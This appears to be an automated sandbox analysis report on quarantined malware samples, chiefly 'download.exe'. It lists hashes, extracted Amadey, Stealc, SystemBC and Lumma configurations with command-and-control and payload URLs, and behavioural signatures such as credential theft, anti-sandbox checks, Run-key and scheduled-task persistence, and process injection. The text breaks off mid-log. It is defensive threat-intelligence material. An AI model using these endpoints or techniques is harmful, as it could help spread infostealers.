Overview
overview
10Static
static
5quarantine...Ab.exe
windows7-x64
1quarantine...Ab.exe
windows10-2004-x64
10quarantine...Jz.exe
windows7-x64
7quarantine...Jz.exe
windows10-2004-x64
7quarantine...8M.exe
windows7-x64
3quarantine...8M.exe
windows10-2004-x64
3quarantine...0.html
windows7-x64
3quarantine...0.html
windows10-2004-x64
3quarantine...n.html
windows7-x64
3quarantine...n.html
windows10-2004-x64
3quarantine...y.html
windows7-x64
3quarantine...y.html
windows10-2004-x64
3quarantine/am_no.bat
windows7-x64
10quarantine/am_no.bat
windows10-2004-x64
quarantine...ad.exe
windows10-2004-x64
10quarantine...Y.html
windows7-x64
3quarantine...Y.html
windows10-2004-x64
3quarantine...t.html
windows7-x64
3quarantine...t.html
windows10-2004-x64
3quarantine...2.html
windows7-x64
3quarantine...2.html
windows10-2004-x64
3quarantine/pic2.exe
windows7-x64
5quarantine/pic2.exe
windows10-2004-x64
7quarantine/pic3.exe
windows10-2004-x64
8quarantine/random.exe
windows7-x64
10quarantine/random.exe
windows10-2004-x64
10quarantine...s.html
windows7-x64
3quarantine...s.html
windows10-2004-x64
3quarantine...mz.exe
windows7-x64
1quarantine...mz.exe
windows10-2004-x64
10Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
26/02/2025, 23:27
Static task
static1
Behavioral task
behavioral1
Sample
quarantine/0frhMAb.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
quarantine/0frhMAb.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
quarantine/7axE6Jz.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
quarantine/7axE6Jz.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
quarantine/Dyshh8M.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
quarantine/Dyshh8M.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
quarantine/GEFwbK0.html
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
quarantine/GEFwbK0.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
quarantine/I8L5Xon.html
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
quarantine/I8L5Xon.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral11
Sample
quarantine/IxZcQMy.html
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
quarantine/IxZcQMy.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral13
Sample
quarantine/am_no.bat
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
quarantine/am_no.bat
Resource
win10v2004-20250217-en
Behavioral task
behavioral15
Sample
quarantine/download.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral16
Sample
quarantine/imfsCjY.html
Resource
win7-20241010-en
Behavioral task
behavioral17
Sample
quarantine/imfsCjY.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral18
Sample
quarantine/kablenet.html
Resource
win7-20241023-en
Behavioral task
behavioral19
Sample
quarantine/kablenet.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral20
Sample
quarantine/ninite22.html
Resource
win7-20240729-en
Behavioral task
behavioral21
Sample
quarantine/ninite22.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral22
Sample
quarantine/pic2.exe
Resource
win7-20240903-en
Behavioral task
behavioral23
Sample
quarantine/pic2.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral24
Sample
quarantine/pic3.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral25
Sample
quarantine/random.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
quarantine/random.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral27
Sample
quarantine/ssystemfiktums.html
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
quarantine/ssystemfiktums.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral29
Sample
quarantine/xqWgymz.exe
Resource
win7-20240729-en
Behavioral task
behavioral30
Sample
quarantine/xqWgymz.exe
Resource
win10v2004-20250217-en
General
-
Target
quarantine/download.exe
-
Size
3.7MB
-
MD5
63b6337ffee0f98a1e86086a9053192e
-
SHA1
f70c12174b65aaefaeb90b74151b10bc75a13d01
-
SHA256
4fe34666349dc7430da4acd480420156a551230e0d59d2b2ef49db9e2074c376
-
SHA512
41cf1713df50e9427cbfb0c6556bff38947c4ef462507c588f32cb74f49aced32818f965172bfdf6513cd5a1ba39bf32236c4a6f6b4be26bc21729e4c842e1cf
-
SSDEEP
98304:Kg2Rmmrayt5HbFijOHMVixQo1tNZXWPn9EwRKzfOcui:K5Rm8aswOHMIxQetNZXWP95ofOch
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
amadey
5.21
a4d2cd
http://cobolrationumelawrtewarms.com
http://�������� jlgenfekjlfnvtgpegkwr.xyz
-
install_dir
a58456755d
-
install_file
Gxtuum.exe
-
strings_key
00fadbeacf092dfd58b48ef4ac68f826
-
url_paths
/3ofn3jf3e2ljk/index.php
Extracted
systembc
towerbingobongoboom.com
93.186.202.3
-
dns
5.132.191.104
Extracted
lumma
https://collapimga.fun/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
Stealc family
-
Systembc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 545ca2177e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oamb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2v5527.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ lWry6QF.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ runtimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3f8189a097.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 95fec32fd0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08a8bb090e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b59e2e872a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3b39d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 108 6128 powershell.exe 115 5596 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 6128 powershell.exe 5596 powershell.exe 5912 powershell.exe 5152 powershell.exe 5364 powershell.exe -
Downloads MZ/PE file 20 IoCs
flow pid Process 131 4920 Gxtuum.exe 218 2668 rapes.exe 44 2668 rapes.exe 44 2668 rapes.exe 44 2668 rapes.exe 44 2668 rapes.exe 44 2668 rapes.exe 44 2668 rapes.exe 44 2668 rapes.exe 44 2668 rapes.exe 113 5004 3b39d.exe 113 5004 3b39d.exe 113 5004 3b39d.exe 113 5004 3b39d.exe 113 5004 3b39d.exe 113 5004 3b39d.exe 159 3840 BitLockerToGo.exe 185 3904 BitLockerToGo.exe 108 6128 powershell.exe 115 5596 powershell.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5312 msedge.exe 3924 msedge.exe 2388 msedge.exe 1640 chrome.exe 4132 chrome.exe 2324 chrome.exe 4428 chrome.exe 5880 chrome.exe -
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08a8bb090e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08a8bb090e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oamb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lWry6QF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 545ca2177e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 95fec32fd0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 95fec32fd0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b59e2e872a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3f8189a097.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2v5527.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3b39d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion runtimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion runtimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lWry6QF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3f8189a097.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oamb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b59e2e872a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2v5527.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3b39d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 545ca2177e.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation 1W41I9.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation lWry6QF.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation Gxtuum.exe -
Executes dropped EXE 28 IoCs
pid Process 1668 P0p33.exe 3204 1W41I9.exe 2668 rapes.exe 836 2v5527.exe 5004 3b39d.exe 5452 MCxU5Fj.exe 5808 rapes.exe 5580 9e28748818.exe 368 TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE 5012 lWry6QF.exe 4920 Gxtuum.exe 1320 483d2fa8a0d53818306efeb32d3.exe 5960 runtimer.exe 5212 545ca2177e.exe 8 3f8189a097.exe 2720 95fec32fd0.exe 1608 08a8bb090e.exe 2236 8155f4d8b3.exe 1252 8155f4d8b3.exe 5324 8155f4d8b3.exe 4512 8155f4d8b3.exe 5084 rapes.exe 5828 oamb.exe 3620 Gxtuum.exe 5728 b59e2e872a.exe 1968 MCxU5Fj.exe 1332 rapes.exe 5308 Gxtuum.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 95fec32fd0.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 08a8bb090e.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine oamb.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 3b39d.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 545ca2177e.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 3f8189a097.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine b59e2e872a.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 2v5527.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine lWry6QF.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine runtimer.exe -
Loads dropped DLL 2 IoCs
pid Process 5004 3b39d.exe 5004 3b39d.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" download.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" P0p33.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9e28748818.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\9e28748818.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral15/files/0x0009000000023d8a-562.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 836 2v5527.exe 5004 3b39d.exe 5012 lWry6QF.exe 4920 Gxtuum.exe 5960 runtimer.exe 5212 545ca2177e.exe 8 3f8189a097.exe 2720 95fec32fd0.exe 1608 08a8bb090e.exe 5828 oamb.exe 3620 Gxtuum.exe 5728 b59e2e872a.exe 5308 Gxtuum.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5212 set thread context of 3840 5212 545ca2177e.exe 174 PID 2236 set thread context of 4512 2236 8155f4d8b3.exe 180 PID 2720 set thread context of 3904 2720 95fec32fd0.exe 184 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 1W41I9.exe File created C:\Windows\Tasks\Gxtuum.job lWry6QF.exe File created C:\Windows\Tasks\Test Task17.job runtimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4508 2236 WerFault.exe 177 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2v5527.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f8189a097.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08a8bb090e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oamb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language download.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 545ca2177e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1W41I9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3b39d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b59e2e872a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9e28748818.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lWry6QF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 95fec32fd0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8155f4d8b3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8155f4d8b3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P0p33.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language runtimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3b39d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3b39d.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1508 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860752177191" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5968 schtasks.exe 5796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 836 2v5527.exe 836 2v5527.exe 836 2v5527.exe 836 2v5527.exe 836 2v5527.exe 836 2v5527.exe 5004 3b39d.exe 5004 3b39d.exe 5004 3b39d.exe 5004 3b39d.exe 5004 3b39d.exe 5004 3b39d.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 5452 MCxU5Fj.exe 5452 MCxU5Fj.exe 5452 MCxU5Fj.exe 5452 MCxU5Fj.exe 5004 3b39d.exe 5004 3b39d.exe 5004 3b39d.exe 5004 3b39d.exe 1356 msedge.exe 1356 msedge.exe 5312 msedge.exe 5312 msedge.exe 5296 msedge.exe 5296 msedge.exe 5296 msedge.exe 5296 msedge.exe 6128 powershell.exe 6128 powershell.exe 6128 powershell.exe 5296 msedge.exe 5296 msedge.exe 5296 msedge.exe 5296 msedge.exe 5912 powershell.exe 5912 powershell.exe 5912 powershell.exe 5152 powershell.exe 5152 powershell.exe 5152 powershell.exe 5364 powershell.exe 5364 powershell.exe 5364 powershell.exe 5596 powershell.exe 5596 powershell.exe 5596 powershell.exe 5012 lWry6QF.exe 5012 lWry6QF.exe 4920 Gxtuum.exe 4920 Gxtuum.exe 5004 3b39d.exe 5004 3b39d.exe 5960 runtimer.exe 5960 runtimer.exe 5212 545ca2177e.exe 5212 545ca2177e.exe 8 3f8189a097.exe 8 3f8189a097.exe 8 3f8189a097.exe 8 3f8189a097.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 5312 msedge.exe 5312 msedge.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeShutdownPrivilege 1640 chrome.exe Token: SeCreatePagefilePrivilege 1640 chrome.exe Token: SeShutdownPrivilege 1640 chrome.exe Token: SeCreatePagefilePrivilege 1640 chrome.exe Token: SeShutdownPrivilege 1640 chrome.exe Token: SeCreatePagefilePrivilege 1640 chrome.exe Token: SeShutdownPrivilege 1640 chrome.exe Token: SeCreatePagefilePrivilege 1640 chrome.exe Token: SeShutdownPrivilege 1640 chrome.exe Token: SeCreatePagefilePrivilege 1640 chrome.exe Token: SeShutdownPrivilege 1640 chrome.exe Token: SeCreatePagefilePrivilege 1640 chrome.exe Token: SeShutdownPrivilege 1640 chrome.exe Token: SeCreatePagefilePrivilege 1640 chrome.exe Token: SeDebugPrivilege 6128 powershell.exe Token: SeDebugPrivilege 5912 powershell.exe Token: SeDebugPrivilege 5152 powershell.exe Token: SeDebugPrivilege 5364 powershell.exe Token: SeDebugPrivilege 5596 powershell.exe -
Suspicious use of FindShellTrayWindow 54 IoCs
pid Process 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 1640 chrome.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5312 msedge.exe 5580 9e28748818.exe 5580 9e28748818.exe 5580 9e28748818.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5580 9e28748818.exe 5580 9e28748818.exe 5580 9e28748818.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2068 wrote to memory of 1668 2068 download.exe 86 PID 2068 wrote to memory of 1668 2068 download.exe 86 PID 2068 wrote to memory of 1668 2068 download.exe 86 PID 1668 wrote to memory of 3204 1668 P0p33.exe 87 PID 1668 wrote to memory of 3204 1668 P0p33.exe 87 PID 1668 wrote to memory of 3204 1668 P0p33.exe 87 PID 3204 wrote to memory of 2668 3204 1W41I9.exe 89 PID 3204 wrote to memory of 2668 3204 1W41I9.exe 89 PID 3204 wrote to memory of 2668 3204 1W41I9.exe 89 PID 1668 wrote to memory of 836 1668 P0p33.exe 90 PID 1668 wrote to memory of 836 1668 P0p33.exe 90 PID 1668 wrote to memory of 836 1668 P0p33.exe 90 PID 2068 wrote to memory of 5004 2068 download.exe 94 PID 2068 wrote to memory of 5004 2068 download.exe 94 PID 2068 wrote to memory of 5004 2068 download.exe 94 PID 5004 wrote to memory of 1640 5004 3b39d.exe 96 PID 5004 wrote to memory of 1640 5004 3b39d.exe 96 PID 1640 wrote to memory of 2432 1640 chrome.exe 97 PID 1640 wrote to memory of 2432 1640 chrome.exe 97 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 